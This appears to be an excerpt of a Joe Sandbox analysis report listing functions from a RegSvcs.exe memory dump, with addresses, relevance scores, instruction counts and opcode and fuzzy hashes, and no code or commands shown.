                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25fbf328a32517734dd8a62711fc8ed17ff69b607f724aade313e492259053c3
                                                          • Instruction ID: 6f324656fd500546ebd4daf3c9d2b13dc3a79dbee792404ebb4a7e29e00fd585
                                                          • Opcode Fuzzy Hash: 25fbf328a32517734dd8a62711fc8ed17ff69b607f724aade313e492259053c3
                                                          • Instruction Fuzzy Hash: 89A1DC72A00652EFD722DF58C980B6ABBE9FF58704F05092DF6859B6A1D334ED01CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01502B57 Relevance: .3, Instructions: 266COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction ID: 5cc083359700c2bc55e3d5f0e26908cf5bbc3afc473631e22bc42898e2420609
                                                          • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                          • Instruction Fuzzy Hash: F8B12971E0061ADFDF26CFA9C884AADB7B5BF48310F14816AE915AB394D730AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B60E0 Relevance: .3, Instructions: 264COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f6aa6ad00dac1ae7371bdad001b35d6fb5c58f35dac8c167b72323ce8bac00b
                                                          • Instruction ID: fb9b624f5d2c279a22158a9ab793ef40ef54cd47a174ac3fc08bd7caa8db99d6
                                                          • Opcode Fuzzy Hash: 1f6aa6ad00dac1ae7371bdad001b35d6fb5c58f35dac8c167b72323ce8bac00b
                                                          • Instruction Fuzzy Hash: E191A071D00216AFDF15DFA9D8C0BFEBBB5AB58710F16416AEA10AB361D734D9018BB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0144E3F0 Relevance: .3, Instructions: 261COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5ac4f758a5dde41b860c3fb9448a6f178bf9234255dc224c1e3bf84de11dc65
                                                          • Instruction ID: 99aac012ddee1d40c534eda97c427ef115912ae8dab01581a4dceff37519f2a2
                                                          • Opcode Fuzzy Hash: f5ac4f758a5dde41b860c3fb9448a6f178bf9234255dc224c1e3bf84de11dc65
                                                          • Instruction Fuzzy Hash: 7D91F432A00626CBFB24DB69C444B7ABBA1FF94714F05416FED05AB3A1E738D942C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01486ACC Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 044bc4d23fd4977ddcc6244b5175cf095879ad5e3e329246d66191b7b3a8ef80
                                                          • Instruction ID: 9ce12be16ad6d3deaeaf1648bdbc235a9a2eff7277b05ddfcce728372e784af7
                                                          • Opcode Fuzzy Hash: 044bc4d23fd4977ddcc6244b5175cf095879ad5e3e329246d66191b7b3a8ef80
                                                          • Instruction Fuzzy Hash: 5D81A1B1E006269BDB64DF69C940ABEBBF9FB48700F05852FE445D7650E334D941CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014FAB40 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction ID: f4de900feb19a12a7e89a4dcf185c050abf11543f4b27a98c9590b70e333bb5f
                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                          • Instruction Fuzzy Hash: 4D819731A002499FDF19CF59C490AAEBBF6FF94310F24856EDA199B395D734D902CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146E284 Relevance: .2, Instructions: 212COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b19a351d4971bd72cbc3cd636953355d88e3b9d743dd684570f59646258cca65
                                                          • Instruction ID: d92360b83c653e92e4450153a4bf0346a5ea04b6101ff1c54ccf038071cdc96f
                                                          • Opcode Fuzzy Hash: b19a351d4971bd72cbc3cd636953355d88e3b9d743dd684570f59646258cca65
                                                          • Instruction Fuzzy Hash: C6815075A00609AFDB25CFA9C880AEFBBFAFF58354F10442EE555A7260D770AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0144C640 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2313800ac8606bf19b2560cad01507f93470766162aaa564226493c2c2c09593
                                                          • Instruction ID: 74d832c21929298b5322c4acaad177ae1b79ab73a51549faac3bbd012bce9555
                                                          • Opcode Fuzzy Hash: 2313800ac8606bf19b2560cad01507f93470766162aaa564226493c2c2c09593
                                                          • Instruction Fuzzy Hash: AE71CE75D0166A9BDB25CF59C4907BEBBB0FF5A710F18421BE852AB360D7309806CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014E47A0 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 6abb5a4ea41cb7b5628a948314a96bd4d4971d733f6133d4697409b3fc017293
                                                          • Instruction ID: f3c252aecd3160afc43d516f40f2c76a5292b012c5f1c21dcb70f8f9cf9cbee4
                                                          • Opcode Fuzzy Hash: 6abb5a4ea41cb7b5628a948314a96bd4d4971d733f6133d4697409b3fc017293
                                                          • Instruction Fuzzy Hash: 9D71A472D00209DFDB30DF59C548A9ABBF4FF91311F19415BEA20EB2A8C7359944DB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0144260B Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0a5530775fecbdebb504b7c07ee78dd8c829a31d57761c9d1a17d24f7e18a6d6
                                                          • Instruction ID: c4228bc322da22e8cb0fb62468f3262074fe4e0c06498d40d0b5adc81a752dbb
                                                          • Opcode Fuzzy Hash: 0a5530775fecbdebb504b7c07ee78dd8c829a31d57761c9d1a17d24f7e18a6d6
                                                          • Instruction Fuzzy Hash: 3871DE356046429FE311DF29D484B2ABBE5FF98310F0585ABF898CB362DB74D846CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014B035C Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: ec90a2dbd45528b6ceb789827d7ddcd78e7d125752641d04e67c8cc548d91226
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: 60715171D0061AAFDB10DFAAC984EDEBBB9FF58700F10456AE505A7260DB34EA41CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014C62A0 Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5035d395680c6fca842d01319b3be683572b4d330684586a4fd8afba9e35aa12
                                                          • Instruction ID: ab7c509695e03af2c431323b8fce4a038084e8f3dcb97c49d81bb3729732a436
                                                          • Opcode Fuzzy Hash: 5035d395680c6fca842d01319b3be683572b4d330684586a4fd8afba9e35aa12
                                                          • Instruction Fuzzy Hash: CC71F43A200701AFE732DF19C844F66BBA6EF50B20F16852EE2558B3B1D774E945CB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01508324 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6cabcf4ca651eeb2534b7dddda03e67c9d034cf9c181d17aa4afd2e513267d3
                                                          • Instruction ID: ce0e268d4a05bf693ab530af9d5b852c672290a8932cc08b4636920974ac3ab5
                                                          • Opcode Fuzzy Hash: e6cabcf4ca651eeb2534b7dddda03e67c9d034cf9c181d17aa4afd2e513267d3
                                                          • Instruction Fuzzy Hash: 93711B71E00619BFDB16DFD5CC41FEEBBB8FB14750F10451AE610AA290D774AA45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014EA250 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4806c6bf3514d24a93377ac572a5964e31af50c4475dca55cebc8f47cb1af559
                                                          • Instruction ID: 8f6017d79b42bc55fbf9278b71227a8330dc52bca3cdc1907500078f0746a5c8
                                                          • Opcode Fuzzy Hash: 4806c6bf3514d24a93377ac572a5964e31af50c4475dca55cebc8f47cb1af559
                                                          • Instruction Fuzzy Hash: A451CF72504612AFD722DE69C848E5BBBE8EBD5715F01093EFA40DB260D770ED05CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D8350 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a8c368761c3fba839d037957d6f1ae3c432ece57cd074f3c676d2941e65f0dac
                                                          • Instruction ID: d5cef45ac008fb2dd077869b51a9d24d549b30128eb464c8c2e91d9422291eff
                                                          • Opcode Fuzzy Hash: a8c368761c3fba839d037957d6f1ae3c432ece57cd074f3c676d2941e65f0dac
                                                          • Instruction Fuzzy Hash: 4451BD709007069FDB21DF5AC890AABFBF8BFA4714F10462FD296976B0D7B0A541CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146E443 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: faa54f02403f55b47086c55879031044e48b1b796b62bc850bf6f9b5df926af7
                                                          • Instruction ID: 0a5f3e0328ba4c8817d1448cb92f3c77d5b90df9e053b464067dba6a72e1d80f
                                                          • Opcode Fuzzy Hash: faa54f02403f55b47086c55879031044e48b1b796b62bc850bf6f9b5df926af7
                                                          • Instruction Fuzzy Hash: EC514A72200A15DFDB22EFAAC980EAAB3FDFB24648F41042FE55197270E730E941CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014D4180 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b08efc838044943fd52f67a21d1da1f24766b8f696ff474b9a4390972ef1683b
                                                          • Instruction ID: 3639832c562dc8c163bcb4b4bc724696d4ba19c5f42e2a1ff7a7a473092dc0f3
                                                          • Opcode Fuzzy Hash: b08efc838044943fd52f67a21d1da1f24766b8f696ff474b9a4390972ef1683b
                                                          • Instruction Fuzzy Hash: 275157716083428FDB54DF6EC890A6BBBE5BFD8604F48492EF589C7660EB30D905CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014545B1 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: 12399529734fcae3bfdf5bfe1ce5173cbbe8aa5afeb6834a92d51816653743fa
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: 78518F71D0021AABDF55DF94C440BEEBBB5AF45754F08406AEA05AF361E734ED84CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BE9E0 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: 273bb2f9d91e47c23e12f01570ac3ec287472cd45f2547d5aed08031b470ff4a
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: 1951B53190420AABEF21DA95C8D0BEFBB78AB94324F11465BD612772B1D7709E4187B0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014F8B28 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 314d51e0f4d694301f4e4d1d712c2ec6a10cdb591a2085dfd637c4db01885b53
                                                          • Instruction ID: 18c3039f54a414b512f1ccc31564bd8a6a7fd199f0e598347e99c8b2c7b6b301
                                                          • Opcode Fuzzy Hash: 314d51e0f4d694301f4e4d1d712c2ec6a10cdb591a2085dfd637c4db01885b53
                                                          • Instruction Fuzzy Hash: 5C41D6707016579BE625DB2DC895B7BBB96EF90620F04411EFB558F3A1DB30D801C691
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014BCBF0 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dec917ec6112eaf279d123911d254ecb4ac382f1306dee194fe67210f0daf15d
                                                          • Instruction ID: bf9c8a7cb144928bd4fca1ffd9cf31e5f68fc50b5ce44aa6450509effcca2911
                                                          • Opcode Fuzzy Hash: dec917ec6112eaf279d123911d254ecb4ac382f1306dee194fe67210f0daf15d
                                                          • Instruction Fuzzy Hash: 37517C76A00216DFCB30DFA9C9C09AFBBB9FB69354B11451AD916A7310D770AD02CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0146A430 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7b3c9ca7f64e37dd9901213dce8731289e9fa0cf2299c9401c036fc6d82fe40e
                                                          • Instruction ID: 2e43575e36e1a43579f9c902e732e13e703be1aeae6ce48f2b5746b6db8f5008
                                                          • Opcode Fuzzy Hash: 7b3c9ca7f64e37dd9901213dce8731289e9fa0cf2299c9401c036fc6d82fe40e
                                                          • Instruction Fuzzy Hash: 1F413B726002119BDB39EF69D880B6A3768EB6670CF47102FED05AF361D771D8048752
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014FA9D3 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 1e15947ce112dbd411fa6fa98f8a2ab478f866d4af6c75b8e58af001b072a4c3
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: 2D41F631A007169FD725CF28C884A6BB7A9FF90210B14462FEB1687760EB30EC0DCB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014601F8 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34b77a287ed4f065a7c6b2aa89692bf24e50ae6f90f0cca7d3a56a82da4b7279
                                                          • Instruction ID: de8f17b97ffb94ee69698b0276d5ea348ef4bd75e33dcc27a69619e66876c220
                                                          • Opcode Fuzzy Hash: 34b77a287ed4f065a7c6b2aa89692bf24e50ae6f90f0cca7d3a56a82da4b7279
                                                          • Instruction Fuzzy Hash: 3A41BC369002199BDB14DF99C440AEEBBB8BF58718F15816FF815E7360D7349C42CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145EBFC Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc2e505c00c6a3d3f83a4875728fb1c2ebad78ef94b6fefe40d884269ee28fe0
                                                          • Instruction ID: 93cb0328f3d815b5abafb127afd3786a5b41ed4973db3955bc9a0aa83a45294c
                                                          • Opcode Fuzzy Hash: fc2e505c00c6a3d3f83a4875728fb1c2ebad78ef94b6fefe40d884269ee28fe0
                                                          • Instruction Fuzzy Hash: 6E41F6712043029FDB61DF29C884A27BBE5FF94214F00492FE957D7722DB31E5498B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472750 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: a6ceae441cd459d250fc26a053a888de9849de44533d0a65bc4937e6c6e77d6f
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: 89517B75A00215CFDB15CF98C480AAEF7B2FF94710F6981AAD915A7361D770AE42CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01436154 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 255fc52c12b3ae75c009c5fcc636d54206ba81f57c3750fb7a2e867c64d1260b
                                                          • Instruction ID: 5c733a0177b0cb3d85a189e96348897225b33c27be589f88af59393a7bdf9ac3
                                                          • Opcode Fuzzy Hash: 255fc52c12b3ae75c009c5fcc636d54206ba81f57c3750fb7a2e867c64d1260b
                                                          • Instruction Fuzzy Hash: 14513771900117EBEB359B28CC00BA9BBB4FF55314F0642ABE525973E1D7745A81CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01430BCD Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7514b1e58e6b975ccbefc8328b9cabc11ccd1ba9d04e435ee7e41dd088b5d6aa
                                                          • Instruction ID: 12845b2860db9570bde76627e5b8a447bb92e1e5edc6b3bf38380087c1af5488
                                                          • Opcode Fuzzy Hash: 7514b1e58e6b975ccbefc8328b9cabc11ccd1ba9d04e435ee7e41dd088b5d6aa
                                                          • Instruction Fuzzy Hash: 5041A731A002299BDB21EF69C940BEE77B4EF99750F0101AAE908AB361D774DE85CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 014F866E Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: f476796af880010fb3d63a11feac36c0c10b44e89536045c8e0692b236eca458
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: 42419575B00206ABEB15DF99CC95AAFBBBAAF94600F14406EE6049B361D670DD11C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01430887 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 414e205ce933ffacdcaf53fed084dcf4d969b1fe735bc26cb642e525769610e2
                                                          • Instruction ID: d20630913291378d00d9b8cb346fabadda688c810839897e287a0e57c3710436
                                                          • Opcode Fuzzy Hash: 414e205ce933ffacdcaf53fed084dcf4d969b1fe735bc26cb642e525769610e2
                                                          • Instruction Fuzzy Hash: EC41A0B1600702DFE325DF29D580A26BBF9FF89314B144A6FE55787A60E730E846CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0145A470 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
